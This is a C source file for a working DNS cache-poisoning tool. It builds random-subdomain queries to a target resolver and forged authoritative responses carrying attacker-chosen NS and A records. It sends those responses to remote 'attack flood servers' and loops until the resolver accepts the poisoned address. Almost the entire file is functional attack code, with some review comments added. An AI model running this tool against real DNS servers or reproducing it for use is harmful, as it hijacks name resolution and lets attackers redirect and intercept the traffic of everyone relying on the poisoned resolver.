/*
 * 2008+ Copyright (c) Evgeniy Polyakov <johnpol@2ka.mipt.ru>
 * All rights reserved.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 */

#include <sys/types.h>
#include <sys/socket.h>

#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <dirent.h>
#include <pthread.h>
#include <signal.h>
#include <poll.h>
#include <time.h>

#include <netinet/in.h>
#include <arpa/inet.h>

#include "query.h"
#include "list.h"
#include "attack.h"

/*
 * Built-in defaults for the command-line options parsed in main() and
 * printed by query_usage(). They are mutable char arrays (not const)
 * because main() stores them in plain `char *` variables.
 */
static char default_server_addr[] = "127.0.0.1";	/* -a: DNS server to query */
static char default_server_port[] = "53";		/* -p: DNS server port */
static int default_query_protocol = IPPROTO_UDP;	/* -P: IP protocol number for the query socket */
static char default_query[] = "www.tservice.net.ru";	/* -q: name whose base domain (after the first dot) is used */
static char default_ns_query[] = "nserver.tservice.net.ru";	/* -n: name server placed in the forged response */
static char default_query_addr[] = "127.0.0.1";	/* -Q: address placed in the forged records */
static char default_auth_addr[] = "127.0.0.1";	/* -A: address copied into attack_data.saddr */
static int default_query_class = QUERY_CLASS_IN;	/* -c */
static int default_query_type = QUERY_TYPE_A;		/* -t */

/* Connected attack servers (struct attack_server), appended by add_attack_server(). */
static LIST_HEAD(attack_server_list);

/*
 * query_init_socket - create an IPv4 socket and connect it to addr:port.
 * @addr:    host to connect to; resolved with getaddrinfo() restricted to AF_INET.
 * @port:    numeric port string (AI_NUMERICSERV is set, service names are rejected).
 * @proto:   IPPROTO_UDP selects SOCK_DGRAM; any other value selects SOCK_STREAM.
 * @sa:      optional; when non-NULL together with @addrlen, receives a copy of
 *           the resolved peer address.
 * @addrlen: in: capacity of @sa in bytes; out: number of bytes actually copied
 *           (clamped to the resolved address length).
 *
 * Only the first getaddrinfo() result is tried.
 *
 * Returns the connected descriptor, or -1 after logging the failure (the
 * socket, if created, is closed).
 */
static int query_init_socket(char *addr, char *port,
		int proto, struct sockaddr *sa, unsigned int *addrlen)
{
	int s, err;
	struct addrinfo *ai, hint;
	int type = SOCK_STREAM;

	if (proto == IPPROTO_UDP)
		type = SOCK_DGRAM;

	s = socket(AF_INET, type, proto);
	if (s < 0) {
		ulog_err("Failed to create a socket");
		return -1;
	}

	memset(&hint, 0, sizeof(struct addrinfo));

	hint.ai_flags = AI_NUMERICSERV;
	hint.ai_family = AF_INET;
	hint.ai_socktype = type;
	hint.ai_protocol = proto;

	err = getaddrinfo(addr, port, &hint, &ai);
	if (err) {
		/* getaddrinfo() reports failures via EAI_* codes, not errno. */
		ulog_err("Failed to get address info for %s:%s, err: %d (%s)",
				addr, port, err, gai_strerror(err));
		goto err_out_close;
	}

	err = connect(s, ai->ai_addr, ai->ai_addrlen);
	if (err) {
		ulog_err("Failed to connect to %s:%s", addr, port);
		goto err_out_free;
	}

	if (sa && addrlen) {
		/* Never copy more than either the caller's buffer or the address holds. */
		if (*addrlen > ai->ai_addrlen)
			*addrlen = ai->ai_addrlen;

		memcpy(sa, ai->ai_addr, *addrlen);
	}

	freeaddrinfo(ai);

	ulog("Connected to %s:%s.\n", addr, port);

	return s;

err_out_free:
	freeaddrinfo(ai);
err_out_close:
	close(s);
	return -1;
}

/*
 * One attack server given on the command line as "-s addr:port:pmin-pmax".
 * Allocated and connected (over TCP) by add_attack_server(); unlinked,
 * closed and freed by destroy_attack_server().
 */
struct attack_server
{
	struct list_head		entry;		/* link in attack_server_list */
	struct sockaddr_in		addr;		/* resolved server address, used for log messages */
	unsigned int			addrlen;	/* bytes of addr filled in by query_init_socket() */
	int				s;		/* connected TCP socket */
	int				pmin, pmax;	/* range forwarded with every attack_data message; NOTE(review): presumably a port range on the server side — confirm */
};

/*
 * add_attack_server - parse "addr:port:pmin-pmax", connect to addr:port over
 * TCP and append the server to attack_server_list.
 * @addr: the option string; it is modified in place (the two ':' separators
 *        are overwritten with '\0').
 *
 * pmin/pmax must satisfy 0 <= pmin <= pmax <= 65535, because they are later
 * sent to the server as 16-bit fields and larger values would be truncated.
 *
 * Returns 0 on success, -1 on a malformed spec, allocation failure or
 * connection failure (each case is logged).
 */
static int add_attack_server(char *addr)
{
	char *port, *ports;
	char extra;
	int pmin, pmax;
	struct attack_server *a;

	port = strchr(addr, ':');
	if (!port || !port[1]) {
		uloga("Wrong attack server format (addr:port). You have to specify 'addr:port:pmin-pmax'.\n");
		goto err_out_exit;
	}
	*port++ = '\0';

	ports = strchr(port, ':');
	if (!ports || !ports[1]) {
		uloga("Wrong attack server format (port:). You have to specify 'addr:port:pmin-pmax'.\n");
		goto err_out_exit;
	}
	*ports++ = '\0';

	/* The trailing %c only matches if junk follows pmax (e.g. "1-2x"). */
	if (sscanf(ports, "%d-%d%c", &pmin, &pmax, &extra) != 2) {
		uloga("Wrong attack server format (pmin-pmax). You have to specify 'addr:port:pmin-pmax'.\n");
		goto err_out_exit;
	}

	if (pmin < 0 || pmax > 65535 || pmin > pmax) {
		uloga("Wrong attack server range %d-%d: need 0 <= pmin <= pmax <= 65535.\n", pmin, pmax);
		goto err_out_exit;
	}

	a = malloc(sizeof(*a));
	if (!a) {
		uloga("Failed to allocate attack server %s:%s.\n", addr, port);
		goto err_out_exit;
	}

	a->addrlen = sizeof(struct sockaddr_in);
	a->pmin = pmin;
	a->pmax = pmax;

	a->s = query_init_socket(addr, port, IPPROTO_TCP, (struct sockaddr *)&a->addr, &a->addrlen);
	if (a->s < 0) {
		ulog("Failed to connect to attack server %s:%s.\n", addr, port);
		goto err_out_free;
	}

	list_add_tail(&a->entry, &attack_server_list);

	return 0;

err_out_free:
	free(a);
err_out_exit:
	return -1;
}

/*
 * query_usage - print every command-line option with its built-in default.
 * @p: program name shown on the "Usage:" line.
 * All output goes through uloga().
 */
static void query_usage(char *p)
{
	const char *prog = p;

	uloga("Usage: %s <options>\n", prog);

	/* Target DNS server and transport. */
	uloga("	-a addr				- DNS server address. Default: %s.\n", default_server_addr);
	uloga("	-p port				- DNS server port. Default: %s.\n", default_server_port);
	uloga("	-P protocol			- query protocol. Default: %d.\n", default_query_protocol);

	/* Query contents and the records placed in the forged response. */
	uloga("	-q query			- query. Default: %s.\n", default_query);
	uloga("	-n server			- poisoned name server section for above query. Default: %s.\n", default_ns_query);
	uloga("	-Q addr				- query address. Default: %s.\n", default_query_addr);
	uloga("	-t type				- query type. Default: %d.\n", default_query_type);
	uloga("	-c class			- query class. Default: %d.\n", default_query_class);
	uloga("	-A addr				- auth server address. Default: %s.\n", default_auth_addr);

	/* Helper servers and help. */
	uloga("	-s server:port:pmin-pmax	- attack flood servers. Default: no.\n");
	uloga("	-h				- this help.\n");
}

/*
 * create_query - build a one-question DNS query in @buf.
 * @buf:   output buffer; for TCP the message starts 2 bytes in, after the
 *         length prefix.
 * @query: name to ask for; passed to query_fill_question() (NOTE(review):
 *         callers copy it first, suggesting it may be modified — confirm).
 * @type, @class: question type and class.
 * @proto: IPPROTO_TCP adds the DNS-over-TCP 2-byte length prefix.
 * @id:    DNS message ID.
 *
 * Returns the total number of bytes to send: the DNS message length, plus 2
 * for TCP.
 */
static int create_query(void *buf, char *query,
		__u16 type, __u16 class, int proto, __u16 id)
{
	struct query_header *h;
	void *q;
	int hdr_off = (proto == IPPROTO_TCP) ? 2 : 0;
	int msg_len;

	h = (struct query_header *)((char *)buf + hdr_off);
	q = (void *)(h + 1);

	query_fill_header(h, id);
	q = query_fill_question(q, query, type, class);
	h->question_num++;
	query_header_convert(h);

	/* Length of the DNS message itself, excluding any TCP prefix. */
	msg_len = (int)((char *)q - (char *)h);

	if (proto == IPPROTO_TCP) {
		/*
		 * RFC 1035 4.2.2: the prefix holds the message length *excluding*
		 * the prefix itself, in network byte order. memcpy avoids an
		 * unaligned 16-bit store into the byte buffer.
		 */
		__u16 len = htons((__u16)msg_len);

		memcpy(buf, &len, sizeof(len));
	}

	return msg_len + hdr_off;
}

/*
 * query_add_ns - write the resource record "hostq IN NS nsq" (TTL 123456)
 * at @data.
 * @data:  output position inside a DNS message.
 * @hostq: owner name of the record.
 * @nsq:   name server name stored as the record's rdata.
 *
 * Both names are copied into 128-byte local buffers first (longer input is
 * truncated), so the caller's strings are left untouched.
 * NOTE(review): the copies suggest query_fill_name() rewrites its input —
 * confirm. Also confirm that its encoded output for a 127-character name
 * fits the 128 bytes reserved after struct rr.
 *
 * Returns the number of bytes written at @data.
 */
static int query_add_ns(void *data, char *hostq, char *nsq)
{
	char owner[128], target[128];
	char rrbuf[sizeof(struct rr) + 128];
	struct rr *ns_rr = (struct rr *)rrbuf;
	char *out = data;
	int written;

	snprintf(owner, sizeof(owner), "%s", hostq);
	snprintf(target, sizeof(target), "%s", nsq);

	/* Owner name first; the record body follows directly after it. */
	written = query_fill_name(owner, data);

	ns_rr->type = QUERY_TYPE_NS;
	ns_rr->class = QUERY_CLASS_IN;
	ns_rr->ttl = 123456;
	ns_rr->rdlen = query_fill_name(target, (char *)ns_rr->rdata);

	written += query_add_rr_noname((void *)(out + written), ns_rr);

	return written;
}

/*
 * create_response - build a DNS response message at @data.
 *
 * Sections written, in order:
 *   header:     ID 0, one question, one answer, one authority and one
 *               additional record; flags RESPONSE | RA | AA.
 *   question:   @query with @type / @class.
 *   answer:     record emitted by query_add_rr() with @type / @class,
 *               TTL 123456, 4-byte rdata = @query_addr.
 *   authority:  "@addon IN NS @ns" via query_add_ns().
 *   additional: owner name @ns, the same @type / @class / TTL, 4-byte
 *               rdata = @ns_addr. It is an address record only when @type
 *               is QUERY_TYPE_A.
 *
 * @query_addr and @ns_addr are copied byte-for-byte into rdata, so they are
 * expected in network byte order.
 * NOTE(review): @query and @ns are handed to query_fill_* helpers that may
 * rewrite them in place — confirm.
 *
 * Returns the number of bytes written at @data.
 */
static int create_response(void *data, char *query, __u32 query_addr,
		char *addon, char *ns, __u32 ns_addr, __u16 type, __u16 class)
{
	/* Scratch record reused for the answer and additional sections. */
	char buf[sizeof(struct rr) + 128];
	struct rr *rr = (struct rr *)buf;
	struct query_header *h = data;
	int size;
	void *q = (h + 1);
	
	rr->type = type;
	rr->class = class;
	rr->ttl = 123456;
	rr->rdlen = 4;

	query_fill_header(h, 0);

	memcpy(rr->rdata, &query_addr, 4);
	q = query_fill_question(q, query, type, class);
	h->question_num++;

	/* Answer section: rdata currently holds query_addr. */
	size = query_add_rr(q, rr);
	q += size;
	h->answer_num++;

	/* Authority section: addon IN NS ns. */
	size = query_add_ns(q, addon, ns);
	q += size;
	h->auth_num++;

	/* Additional section: owner name written separately, then the body. */
	size = query_fill_name(ns, q);
	q += size;

	/* Reuse the scratch record; only rdata changes (now ns_addr). */
	memcpy(rr->rdata, &ns_addr, 4);
	size = query_add_rr_noname(q, rr);
	q += size;
	h->addon_num++;

	h->flags |= QUERY_FLAGS_RESPONSE | QUERY_FLAGS_RA | QUERY_FLAGS_AA;

	/* Counters and flags are final; presumably converts them to wire order — confirm. */
	query_header_convert(h);
	return q - data;
}

/*
 * destroy_attack_server - log, unlink, close and free one attack server.
 * @a: server to dispose of. It must currently be linked into a list, because
 *     list_del() is called on it. The pointer is invalid on return.
 */
static void destroy_attack_server(struct attack_server *a)
{
	struct sockaddr_in *peer = &a->addr;

	ulog("Destroyed attack server %s:%d\n",
		inet_ntoa(peer->sin_addr), ntohs(peer->sin_port));

	list_del(&a->entry);
	close(a->s);
	free(a);
}

/*
 * broadcast_attack_response - send one DNS message to every attack server.
 * @buf:   DNS message to forward, @size bytes long.
 * @size:  length of @buf; a negative value is rejected.
 * @sa:    its IPv4 address is copied into attack_data.daddr.
 * @saddr: copied unchanged into attack_data.saddr.
 *
 * Each server receives a struct attack_data header immediately followed by
 * @buf. The header's size field and that server's pmin/pmax are sent in
 * network byte order. A server whose send() fails is logged and destroyed,
 * which removes it from attack_server_list. A '.' is printed for each
 * successful send.
 *
 * NOTE(review): a short send() on the TCP stream is treated as success,
 * which would desynchronise the receiver; consider looping until all bytes
 * are sent.
 *
 * Returns 0 while at least one server remains, -1 if the list is empty or
 * @size is negative.
 */
static int broadcast_attack_response(void *buf, int size, struct sockaddr_in *sa, __u32 saddr)
{
	struct attack_server *a, *atmp;
	int err;

	/* A negative length would make the VLA below undefined behaviour. */
	if (size < 0)
		return -1;

	char data[size + sizeof(struct attack_data)];
	struct attack_data *adata = (struct attack_data *)data;

	adata->size = htonl(size);
	memcpy(adata+1, buf, size);
	adata->daddr = sa->sin_addr.s_addr;
	adata->saddr = saddr;

	list_for_each_entry_safe(a, atmp, &attack_server_list, entry) {
		/* Host -> network order for the outgoing fields. */
		adata->pmin = htons(a->pmin);
		adata->pmax = htons(a->pmax);

		err = send(a->s, data, sizeof(data), 0);
		if (err <= 0) {
			ulog_err("\nFailed to broadcast attack data to %s:%d, err: %d",
				inet_ntoa(a->addr.sin_addr), ntohs(a->addr.sin_port), err);
			destroy_attack_server(a);
			continue;
		}

		uloga(".");
	}

	return -list_empty(&attack_server_list);
}

/*
 * parse_answer - check whether a DNS reply's first answer carries a given address.
 * @data:        start of the DNS message (past any TCP length prefix). The
 *               header is passed to query_parse_header() first (presumably
 *               converted in place — confirm).
 * @poison_addr: 4-byte address to compare with the first answer's rdata.
 *
 * Returns 0 when the first 4 rdata bytes of the first answer record equal
 * *@poison_addr. Returns -1 when they differ, when the reply has no
 * answers, or when query_parse_rr() fails.
 *
 * NOTE(review): no buffer length reaches the parsers, so a truncated or
 * malicious reply is parsed without bounds checks. The answer's type/rdlen
 * is also not checked before its 4 rdata bytes are compared.
 */
int parse_answer(void *data, __u32 *poison_addr)
{
	struct query_header *hdr = data;
	void *cursor;
	struct rr *answer;
	unsigned int off = 0;
	char qname[QUERY_RR_NAME_MAX_SIZE];
	__u16 qtype, qclass;
	int idx, matched;

	query_parse_header(hdr);

	/* Skip the question section; its contents are not needed. */
	cursor = (void *)(hdr + 1);
	for (idx = 0; idx < hdr->question_num; idx++)
		cursor += query_parse_question(data, cursor, qname, &qtype, &qclass);

	if (hdr->answer_num == 0)
		return -1;

	answer = query_parse_rr(data, cursor, &off);
	if (answer == NULL)
		return -1;

	matched = (memcmp(answer->rdata, poison_addr, 4) == 0);
	free(answer);

	return matched ? 0 : -1;
}

/*
 * sigpipe_signal - empty SIGPIPE handler. Installing it stops the default
 * terminate-on-SIGPIPE action, so a write to a closed socket fails with an
 * error return that the caller can handle.
 */
static void sigpipe_signal(int signo)
{
	(void)signo;
}

int main(int argc, char *argv[])
{
	int ch, proto, class, type, s, err, query_len, response_len, num;
	unsigned int salen;
	char *addr, *port, *query, *query_addr, *auth, *ns_query, *base;
	struct attack_server *a, *atmp;
	char rbuf[16*1024];
	char qbuf[16*1024];
	char attack_query[256], tmpq[256], nsq[256], attack_tmpq[256];
	__u32 poison_addr, auth_addr;
	__u16 id;
	struct query_header *h;
	struct sockaddr_in sa;

	addr = default_server_addr;
	port = default_server_port;
	proto = default_query_protocol;
	query = default_query;
	ns_query = default_ns_query;
	query_addr = default_query_addr;
	auth = default_auth_addr;
	class = default_query_class;
	type = default_query_type;

	while ((ch = getopt(argc, argv, "n:A:s:Q:q:c:t:a:p:P:h")) != -1) {
		switch (ch) {
			case 'A':
				auth = optarg;
				break;
			case 'Q':
				query_addr = optarg;
				break;
			case 'n':
				ns_query = optarg;
				break;
			case 'q':
				query = optarg;
				break;
			case 'c':
				class = atoi(optarg);
				break;
			case 't':
				type = atoi(optarg);
				break;
			case 'p':
				port = optarg;
				break;
			case 'a':
				addr = optarg;
				break;
			case 'P':
				proto = atoi(optarg);
				break;
			case 's':
				add_attack_server(optarg);
				break;
			default:
				query_usage(argv[0]);
				return -1;
		}
	}

	if (list_empty(&attack_server_list)) {
		uloga("You have to provide attack servers.\n");
		return -1;
	}

	uloga("query: '%s', query addr: %s, class: %d, type: %d, server: %s:%s, protocol: %d, attack servers: ",
			query, query_addr, class, type, addr, port, proto);
	list_for_each_entry(a, &attack_server_list, entry) {
		uloga("%s:%d ", inet_ntoa(a->addr.sin_addr), ntohs(a->addr.sin_port));
	}
	uloga("\n");

	salen = sizeof(struct sockaddr_in);
	s = query_init_socket(addr, port, proto, (struct sockaddr *)&sa, &salen);
	if (s < 0)
		return -1;

	inet_aton(query_addr, (struct in_addr *)&poison_addr);
	inet_aton(auth, (struct in_addr *)&auth_addr);

	srand(time(NULL));
	signal(SIGPIPE, sigpipe_signal);

	base = strchr(query, '.');
	if (!base) {
		uloga("Broken query '%s', can not get base name (after first dot).\n", query);
		return -1;
	}

	base++;

	num = 0;
	while (1) {
		num++;
		id = 1 + (int)(65535.0 * (rand() / (RAND_MAX + 1.0)));

		snprintf(tmpq, sizeof(tmpq), "%s", query);
		snprintf(nsq, sizeof(nsq), "%s", ns_query);
		snprintf(attack_query, sizeof(attack_query), "%d-%04x-%d.%s", num, id, getpid(), base);

		memcpy(attack_tmpq, attack_query, sizeof(attack_tmpq));
		query_len = create_query(qbuf, attack_tmpq, type, class, proto, id);
		if (query_len < 0)
			return -1;

		memcpy(attack_tmpq, attack_query, sizeof(attack_tmpq));
		response_len = create_response(rbuf, attack_tmpq, poison_addr, tmpq, nsq, poison_addr,
				type, class);
		if (response_len < 0)
			return -1;

		uloga("Using attack query: %s ", attack_query);
		err = broadcast_attack_response(rbuf, response_len, &sa, auth_addr);
		if (err)
			return -1;
		uloga("\n");

		err = send(s, qbuf, query_len, 0);
		if (err <= 0) {
			ulog_err("Failed to send query");
			return err;
		}

		{
			struct pollfd pfd;

			pfd.fd = s;
			pfd.events = POLLIN;
			pfd.revents = 0;

			err = poll(&pfd, 1, 5000);
			if (err < 0) {
				ulog_err("Failed to work with poll");
				return err;
			}

			if (err == 0 || !(pfd.revents & POLLIN)) {
				ulog("Timeout waiting for reply.\n");
				continue;
			}
		}

		err = recv(s, qbuf, sizeof(qbuf), 0);
		if (err <= 0) {
			ulog_err("Failed to receive reply");
			return err;
		}

		h = (struct query_header *)qbuf;
		if (proto == IPPROTO_TCP)
			h = (struct query_header *)(qbuf + 2);

		err = parse_answer(h, &poison_addr);
		if (!err) {
			uloga("Successfully poisoned %s:%s DNS server\n", addr, port);
			uloga("	%s IN NS	%s\n", query, ns_query);
			uloga("	%s IN A		%s\n", ns_query, query_addr);
			break;
		}
	}
	
	list_for_each_entry_safe(a, atmp, &attack_server_list, entry) {
		destroy_attack_server(a);
	}

	return 0;
}
